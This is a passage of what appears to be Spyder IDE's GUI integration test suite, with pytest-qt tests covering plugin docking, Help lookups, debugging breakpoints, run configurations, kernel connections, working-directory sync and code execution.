lock_file=get_conf_path('spyder.lock'))
)
with qtbot.waitSignal(shell.executed, timeout=2000):
shell.execute(lock_code)
qtbot.wait(1000)
assert not shell.get_value('lock_created')
# Test %edit magic
n_editors = editorstack.get_stack_count()
p = tmpdir.mkdir("foo").join("bar.py")
p.write(lock_code)
with qtbot.waitSignal(shell.executed):
shell.execute('%edit {}'.format(to_text_string(p)))
qtbot.wait(3000)
assert editorstack.get_stack_count() == n_editors + 1
assert editorstack.get_current_editor().toPlainText() == lock_code
main_window.editor.close_file()
@pytest.mark.slow
def test_lock_action(main_window):
"""Test the lock interface action."""
action = main_window.layouts.lock_interface_action
plugins = main_window.widgetlist
# By default the interface is locked.
assert main_window.layouts._interface_locked
# In this state the title bar is an empty QWidget
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert not isinstance(title_bar, DockTitleBar)
assert isinstance(title_bar, QWidget)
# Test that our custom title bar is shown when the action
# is triggered.
action.trigger()
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert isinstance(title_bar, DockTitleBar)
assert not main_window.layouts._interface_locked
# Restore default state
action.trigger()
assert main_window.layouts._interface_locked
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.skipif(sys.platform.startswith('linux') and not running_in_ci(),
reason='Fails on Linux when run locally')
def test_default_plugin_actions(main_window, qtbot):
"""Test the effect of dock, undock, close and toggle view actions."""
# Use a particular plugin
file_explorer = main_window.explorer
main_widget = file_explorer.get_widget()
# Undock action
main_widget.undock_action.triggered.emit(True)
qtbot.wait(500)
main_widget.windowwidget.move(200, 200)
assert not file_explorer.dockwidget.isVisible()
assert main_widget.undock_action is not None
assert isinstance(main_widget.windowwidget, SpyderWindowWidget)
assert main_widget.windowwidget.centralWidget() == main_widget
# Dock action
main_widget.dock_action.triggered.emit(True)
qtbot.wait(500)
assert file_explorer.dockwidget.isVisible()
assert main_widget.windowwidget is None
# Test geometry was saved on close
geometry = file_explorer.get_conf('window_geometry')
assert geometry != ''
# Test restoring undocked plugin with the right geometry
file_explorer.set_conf('undocked_on_window_close', True)
main_window.restore_undocked_plugins()
assert main_widget.windowwidget is not None
assert (
geometry == qbytearray_to_str(main_widget.windowwidget.saveGeometry())
)
main_widget.windowwidget.close()
# Close action
main_widget.close_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert not file_explorer.toggle_view_action.isChecked()
# Toggle view action
file_explorer.toggle_view_action.setChecked(True)
assert file_explorer.dockwidget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True)
def test_opengl_implementation(main_window, qtbot):
"""
Test that we are setting the selected OpenGL implementation
"""
assert main_window._test_setting_opengl('software')
# Restore default config value
CONF.set('main', 'opengl', 'automatic')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
"""
Test that we filter a warning shown when an array contains nan
values and the Variable Explorer option 'Show arrays min/max'
is on.
For spyder-ide/spyder#7063.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create an array with a nan value
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np; A=np.full(16, np.nan)')
qtbot.wait(1000)
# Assert that no warnings are shown in the console
assert "warning" not in control.toPlainText()
assert "Warning" not in control.toPlainText()
# Restore default config value
CONF.set('variable_explorer', 'minmax', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
reason="Times out in PY2 and fails on other than macOS")
def test_get_help_combo(main_window, qtbot):
"""
Test that Help can display docstrings for names typed in its combobox.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
if WEBENGINE:
webpage = webview.page()
else:
webpage = webview.page().mainFrame()
# --- From the console ---
# Write some object in the console
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np')
# Get help - numpy
object_combo = help_plugin.get_widget().object_combo
object_combo.setFocus()
qtbot.keyClicks(object_combo, 'numpy', delay=100)
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - numpy.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
# Get help - np
# Clear combo
object_combo.set_current_text('')
qtbot.keyClicks(object_combo, 'np', delay=100)
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - np.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
with dot calls i.e np.sin
See spyder-ide/spyder#11821
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name
qtbot.keyClicks(control, u'np.linalg.norm')
# Get help
control.inspect_current_object()
# Check that an expected text is part of the page
qtbot.waitUntil(
lambda: check_text(webpage, "Matrix or vector norm."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="Too flaky on Mac")
def test_get_help_ipython_console_special_characters(
main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
for unusual characters.
See spyder-ide/spyder#7699
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name and assert in Console
def check_control(control, value):
return value in control.toPlainText()
qtbot.keyClicks(control, u'aa\t')
qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000)
# Get help
control.inspect_current_object()
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' and running_in_ci(),
reason="Times out on Windows")
def test_get_help_ipython_console(main_window, qtbot):
"""Test that Help works when called from the IPython console."""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write some object in the console
qtbot.keyClicks(control, 'runfile')
# Get help
control.inspect_current_object()
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Does not work on Mac and Windows!")
@pytest.mark.use_introspection
@pytest.mark.parametrize(
"object_info",
[("range", "range"),
("import numpy as np", "An array object of arbitrary homogeneous items")])
def test_get_help_editor(main_window, qtbot, object_info):
"""Test that Help works when called from the Editor."""
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
main_window.editor.new(fname="test.py", text="")
code_editor = main_window.editor.get_focus_widget()
editorstack = main_window.editor.get_current_editorstack()
with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Write some object in the editor
object_name, expected_text = object_info
code_editor.set_text(object_name)
code_editor.move_cursor(len(object_name))
with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_change()
# Get help
with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000):
editorstack.inspect_current_object()
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000)
@pytest.mark.slow
def test_window_title(main_window, tmpdir):
"""Test window title with non-ascii characters."""
projects = main_window.projects
# Create a project in non-ascii path
path = to_text_string(tmpdir.mkdir(u'測試'))
projects.open_project(path=path)
# Set non-ascii window title
main_window.window_title = u'اختبار'
# Assert window title is computed without errors
# and has the expected strings
main_window.set_window_title()
title = main_window.base_title
assert u'Spyder' in title
assert u'Python' in title
assert u'اختبار' in title
assert u'測試' in title
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Fails sometimes on Windows and Mac")
@pytest.mark.parametrize("debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
"""Test that we move to the first breakpoint if there's one present."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=10)
qtbot.wait(500)
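# Place the cursor at the top of the file so the cell commands below
# start from the first cell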
cursor = code_editor.textCursor()
cursor.setPosition(0)
code_editor.setTextCursor(cursor)
if debugcell:
# Advance 2 cells
for i in range(2):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Debug the cell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
# Make sure everything is ready
assert shell.spyder_kernel_comm.is_open()
assert shell.is_waiting_pdb_input()
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!b')
assert 'script.py:10' in shell._control.toPlainText()
# We need to press continue since we don't yet test whether a breakpoint
# is inside the cell
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
else:
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Verify that we are at first breakpoint
shell.clear_console()
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!list")
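# The listing should show execution stopped at line 10, where the
# breakpoint was set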
assert "1--> 10 arr = np.array(li)" in control.toPlainText()
# Exit debugging
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!exit")
# Set breakpoint on first line with code
code_editor.debugger.toogle_breakpoint(line_number=2)
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Wait until execution continues and stops on the breakpoint
qtbot.waitUntil(lambda: "IPdb [2]:" in control.toPlainText())
# Verify that we are still on debugging
assert shell.is_waiting_pdb_input()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
"""Test runconfig workdir options."""
from spyder.plugins.run.widgets import RunConfiguration
CONF.set('run', 'configurations', [])
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Use cwd for this file ---
rc = RunConfiguration().get()
rc['file_dir'] = False
rc['cw_dir'] = True
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in cwd after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == get_home_dir()
# --- Use fixed execution dir for test file ---
temp_dir = str(tmpdir.mkdir("test_dir"))
rc['file_dir'] = False
rc['cw_dir'] = False
rc['fixed_dir'] = True
rc['dir'] = temp_dir
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in fixed dir after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == temp_dir
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
"""Test running code in dedicated consoles."""
from spyder.plugins.run.widgets import RunConfiguration
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Set run options for this file ---
rc = RunConfiguration().get()
# A dedicated console is used when these two options are False
rc['current'] = rc['systerm'] = False
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file and assert that we get a dedicated console ---
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
nsb = main_window.variableexplorer.current_widget()
assert len(main_window.ipyconsole.get_clients()) == 2
assert main_window.ipyconsole.get_widget().filenames == ['', test_file]
assert main_window.ipyconsole.get_widget().tabwidget.tabText(1) == 'script.py/A'
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 4
# --- Assert only runfile text is present and there's no banner text ---
# See spyder-ide/spyder#5301.
text = control.toPlainText()
assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)
# --- Clean namespace after re-execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('zz = -1')
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
assert not shell.is_defined('zz')
# --- Assert runfile text is present after reruns ---
assert 'runfile' in control.toPlainText()
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="Fails frequently on Linux")
def test_connection_to_external_kernel(main_window, qtbot):
"""Test that only Spyder kernels are connected to the Variable Explorer."""
# Test with a generic kernel
km, kc = start_new_kernel()
main_window.ipyconsole.get_widget()._create_client_for_kernel(
kc.connection_file, None, None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that there are no variables in the variable explorer
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 0
python_shell = shell
# Test with a kernel from Spyder
spykm, spykc = start_new_kernel(spykernel=True)
main_window.ipyconsole.get_widget()._create_client_for_kernel(
spykc.connection_file, None, None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that a variable is visible in the variable explorer
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 1
# Test runfile in external_kernel
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# Create a new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"print(2 + 1)"
)
# Start running
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(run_button, Qt.LeftButton)
assert "runfile" in shell._control.toPlainText()
assert "3" in shell._control.toPlainText()
# Try quitting the kernels
shell.execute('quit()')
python_shell.execute('quit()')
qtbot.wait(1000)
# Make sure everything quit properly
assert not km.is_alive()
assert not spykm.is_alive()
# Close the channels
spykc.stop_channels()
kc.stop_channels()
@pytest.mark.order(1)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
"""Test that variable types can't be changed in the Variable Explorer."""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Try to change types
qtbot.keyClicks(QApplication.focusWidget(), "'s'")
qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
qtbot.wait(1000)
# Assert object remains the same
assert shell.get_value('a') == 10
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(
main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and File Explorer when
changing cwd in the IPython console.
"""
wdir = main_window.workingdirectory
treewidget = main_window.explorer.get_widget().treewidget
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(
lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp dir
temp_dir = str(tmpdir.mkdir(test_directory))
# Change directory in IPython console using %cd
with qtbot.waitSignal(shell.executed):
shell.execute(u"%cd {}".format(temp_dir))
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in explorer
assert osp.normpath(treewidget.get_current_folder()) == osp.normpath(
temp_dir)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and IPython console when
changing directories in the File Explorer.
"""
wdir = main_window.workingdirectory
explorer = main_window.explorer
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(
lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp directory
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in the explorer widget
explorer.chdir(temp_dir)
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in IPython console
assert osp.normpath(temp_dir) == osp.normpath(shell._cwd)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(os.name == 'nt' or sys.platform == 'darwin' or
parse_version(ipy_release.version) == parse_version('7.11.0')),
reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
"""Test all the different ways we have to run Cython code"""
# ---- Setup ----
# Get a reference to the code editor widget
code_editor = main_window.editor.get_focus_widget()
# ---- Run pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# Wait until an object appears
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
assert shell.get_value('a') == 3628800
# Reset and close file
reset_run_code(qtbot, shell, code_editor, nsb)
main_window.editor.close_file()
# ---- Import pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
assert shell.get_value('b') == 3628800
# Close file
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that notebooks are open from the Project explorer."""
projects = main_window.projects
projects.toggle_view_action.setChecked(True)
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Copy a test notebook into the project dir
nb = osp.join(LOCATION, 'notebook.ipynb')
shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select notebook in the project explorer
idx = projects.get_widget().treewidget.get_index(
osp.join(project_dir, 'notebook.ipynb'))
projects.get_widget().treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter)
# Assert that the notebook was opened
assert 'notebook.ipynb' in editorstack.get_current_filename()
# Convert notebook to a Python file
projects.get_widget().treewidget.convert_notebook(
osp.join(project_dir, 'notebook.ipynb'))
# Assert the converted Python file was opened
assert 'untitled' in editorstack.get_current_filename()
# Assert its contents are the expected ones
file_text = editorstack.get_current_editor().toPlainText()
if nbconvert.__version__ >= '5.4.0':
expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
'\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
else:
expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
assert file_text == expected_text
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that file are run from the Project explorer."""
projects = main_window.projects
projects.toggle_view_action.setChecked(True)
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Copy a test script into the project dir
test_file = osp.join(LOCATION, 'script.py')
shutil.copy(test_file, osp.join(project_dir, 'script.py'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select file in the project explorer
idx = projects.get_widget().treewidget.get_index(
osp.join(project_dir, 'script.py'))
projects.get_widget().treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter)
# Assert that the file was opened
assert 'script.py' in editorstack.get_current_filename()
# Run Python file
projects.get_widget().treewidget.run([osp.join(project_dir, 'script.py')])
# Wait until the new console is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Wait until all objects have appeared in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Check variables value
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
"""Test that new breakpoints are set in the IPython console."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
# Verify that the breakpoint was set
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!b")
assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run lines ----
# Run the whole file line by line
for _ in range(code_editor.blockCount()):
qtbot.keyClick(code_editor, Qt.Key_F9)
qtbot.wait(200)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell and advance ----
# Run the five cells present in file
# Add an unnamed cell at the top of the file
qtbot.keyClicks(code_editor, 'a = 10')
qtbot.keyClick(code_editor, Qt.Key_Return)
qtbot.keyClick(code_editor, Qt.Key_Up)
for _ in range(5):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the runcell function
assert 'runcell' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
control_text = shell._control.toPlainText()
# Rerun
shell.setFocus()
qtbot.keyClick(shell._control, Qt.Key_Up)
qtbot.wait(500)
qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier)
qtbot.wait(500)
code_editor.setFocus()
assert control_text != shell._control.toPlainText()
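# Keep only the output that was produced by the rerun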
control_text = shell._control.toPlainText()[len(control_text):]
# Check for errors and the runcell function
assert 'runcell' in control_text
assert 'Error' not in control_text
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell ----
# Run the first cell in file
modifier = Qt.ControlModifier
if sys.platform == 'darwin':
modifier = Qt.MetaModifier
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
# Press Ctrl+Enter a second time to verify that we're *not* advancing
# to the next cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
assert nsb.editor.source_model.rowCount() == 1
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Debug cell ------
